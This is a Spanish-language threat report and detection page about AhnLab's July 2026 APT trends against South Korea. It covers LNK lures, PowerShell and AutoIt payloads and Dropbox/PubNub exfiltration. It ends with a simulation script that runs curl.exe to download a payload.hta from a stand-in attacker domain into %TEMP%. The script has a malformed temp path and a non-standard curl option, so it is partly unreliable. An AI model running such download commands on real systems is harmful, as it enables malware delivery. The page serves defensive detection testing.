Informe de Amenazas APT en Corea del Sur: Tendencias de Julio 2026
Detection stack
- AIDR
- Alert
- ETL
- Query
Resumen
AhnLab informa un aumento en la actividad APT dirigida a organizaciones surcoreanas a través de campañas de spear-phishing. Los ataques se basan principalmente en archivos LNK maliciosos para entregar cargas útiles, incluidos scripts de PowerShell, scripts de AutoIt y puertas traseras. Las técnicas comunes incluyen persistencia a través de Programador de Tareas y exfiltración de datos a través de servicios como Dropbox y PubNub.
Investigación
La investigación se centró en la infraestructura APT utilizada contra entidades surcoreanas a lo largo de julio de 2026. Los analistas agruparon la actividad en varios tipos de ataques, de la A a la G, basados en métodos de entrega y características funcionales. Los investigadores también identificaron comportamientos como el DLL side-loading y el abuso de utilidades nativas de Windows como curl.exe para la recuperación de cargas útiles.
Mitigación
Los usuarios deben verificar las identidades de los remitentes y evitar abrir archivos adjuntos recibidos de fuentes desconocidas o no confiables. Las organizaciones deben mantener los sistemas operativos y navegadores web actualizados con los últimos parches de seguridad. También se recomienda mantener actualizadas las soluciones antivirus y de protección de endpoints, como V3.
Respuesta
Si se detectan archivos LNK sospechosos o entradas no autorizadas en el Programador de Tareas, los respondedores de incidentes deben aislar inmediatamente el host afectado. Se debe realizar un análisis forense de memoria para identificar puertas traseras inyectadas o DLLs maliciosos. También se deben revisar los registros de la red en busca de conexiones salientes inusuales a servicios de alojamiento de archivos o canales de comando y control como PubNub.
Flujo de Ataque
Todavía estamos actualizando esta parte.
Detecciones
Comportamiento de Evasión de Defensa MSHTA LOLBAS Sospechoso mediante Detección de Comandos Asociados (a través de process_creation)
Uso Sospechoso de CURL (a través de cmdline)
Tarea Programada Sospechosa (a través de auditoría)
Posible Infiltración / Exfiltración de Datos / C2 a través de Servicios de Terceros / Herramientas (a través de proxy)
Posible Infiltración / Exfiltración de Datos / C2 a través de Servicios de Terceros / Herramientas (a través de dns)
IOCs (HashMd5) para detectar: Informe de Tendencias de Amenazas de Julio 2026 sobre Ataques APT (Corea del Sur)
Curl.exe usado para Descargar y Ejecutar Archivos Maliciosos [Windows Sysmon]
Detectar Comandos Maliciosos de PowerShell dentro de Archivos LNK [Windows Powershell]
Ejecución de Simulación
Prerequisito: El Chequeo Previo de Telemetría y Línea de Base debe haber pasado.
Razonamiento: Esta sección detalla la ejecución precisa de la técnica adversaria (TTP) diseñada para activar la regla de detección. Los comandos y la narrativa DEBEN reflejar directamente los TTPs identificados y apuntan a generar la telemetría exacta esperada por la lógica de detección. Los ejemplos abstractos o no relacionados conducirán a un diagnóstico erróneo.
-
Narrativa del Ataque y Comandos: El adversario intenta usar
curl.exepara descargar un archivo HTA malicioso en el%TEMP%directorio para establecer una base. Para probar si la lógica de detección actual está funcionando (ya que busca específicamente las palabras «download» o «execute»), el atacante usará una línea de comandos que incluya explícitamente estas palabras como parte de un argumento falso o descripción, simulando un script mal construido o un intento específico de imitar el patrón que el SOC está buscando. -
Script de Prueba de Regresión:
# Simular un adversario usando curl con las palabras clave específicas requeridas por la regla $tempPath = $env:TEMPmalicious.hta $url = "http://dominio-controlado-por-atacante.com/payload.hta" # Este comando está diseñado específicamente para activar la lógica de 'contiene' de la regla # al incluir las palabras 'download' y 'execute' en la cadena de línea de comandos. Start-Process "curl.exe" -ArgumentList "-L $url -o $tempPath --comment 'download and execute this file'" -
Comandos de Limpieza:
# Eliminar el archivo temporal creado durante la simulación if (Test-Path "$env:TEMPmalicious.hta") { Remove-Item -Path "$env:TEMPmalicious.hta" -Force }